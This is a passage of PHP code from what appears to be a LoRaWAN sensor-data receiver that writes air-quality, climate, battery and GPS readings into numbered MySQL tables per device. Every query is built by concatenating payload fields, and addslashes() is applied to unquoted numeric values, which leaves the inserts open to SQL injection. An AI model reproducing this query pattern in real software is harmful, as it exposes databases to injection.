if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement203 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement204 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000009') {
logError('hittestress-0000000000000009: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement369 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement370 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement371 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement372 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement373 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement374 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode133 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=133';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000A':
if($data->dev_id == 'ttn_apld_dust_000000000000000a') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement69 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000a') {
logError('hittestress-000000000000000a: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement375 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement376 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement377 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement378 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement379 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement380 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode134 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=134';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000B':
if($data->dev_id == 'ttn_apld_dust_000000000000000b') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement70 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000b') {
logError('hittestress-000000000000000b: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement381 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement382 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement383 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement384 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement385 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement386 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode135 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=135';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000C':
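// Unlike the neighbouring EUIs, every uplink for this device is logged, not only the hittestress-* ones.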
logError('device 0c: '.json_encode($data) );
if($data->dev_id == 'ttn_apld_dust_000000000000000c') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement71 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000c') {
logError('hittestress-000000000000000c: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement387 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement388 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement389 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement390 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement391 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement392 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode136 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=136';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000D':
if($data->dev_id == 'ttn_apld_dust_000000000000000d') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement72 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000d') {
logError('hittestress-000000000000000d: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement393 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement394 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement395 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement396 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement397 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement398 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode137 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=137';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000E':
if($data->dev_id == 'ttn_apld_dust_000000000000000e') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement73 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000e') {
logError('hittestress-000000000000000e: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement399 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement400 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement401 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement402 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement403 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement404 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode138 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=138';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000F':
if($data->dev_id == 'ttn_apld_dust_000000000000000f') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement74 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000010':
if($data->dev_id == 'ttn_apld_dust_0000000000000010') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement75 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000010') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement205 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement206 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement207 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement208 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000011':
if($data->dev_id == 'ttn_apld_dust_0000000000000011') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement76 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000011') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement209 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement210 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement211 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement212 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000012':
if($data->dev_id == 'ttn_apld_dust_0000000000000012') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement77 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000012') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement213 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement214 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement215 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement216 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000013':
if($data->dev_id == 'ttn_apld_dust_0000000000000013') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement78 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000013') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement217 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement218 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement219 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement220 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000014':
if($data->dev_id == 'ttn_apld_dust_0000000000000014') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement79 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000014') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement221 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement222 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement223 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement224 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000015':
if($data->dev_id == 'ttn_apld_dust_0000000000000015') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement80 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000015') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement225 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement226 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement227 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement228 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000016':
if($data->dev_id == 'ttn_apld_dust_0000000000000016') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement81 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000016') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement229 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement230 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement231 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement232 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000017':
if($data->dev_id == 'ttn_apld_dust_0000000000000017') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement82 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000017') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement233 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement234 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement235 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement236 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000018':
if($data->dev_id == 'ttn_apld_dust_0000000000000018') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement83 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000018') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement237 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement238 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement239 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement240 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000019':
if($data->dev_id == 'ttn_apld_dust_0000000000000019') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement84 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000019') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement241 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement242 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement243 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement244 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000020':
if($data->dev_id == 'ttn_apld_dust_20180000000000000020') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement245 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement246 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement247 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement248 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000021':
if($data->dev_id == 'ttn_apld_dust_20180000000000000021') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement249 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement250 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement251 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement252 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000022':
if($data->dev_id == 'ttn_apld_dust_20180000000000000022') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement253 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement254 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement255 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement256 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000023':
if($data->dev_id == 'ttn_apld_dust_20180000000000000023') {
if(isset($data->payload_fields->temp)) {
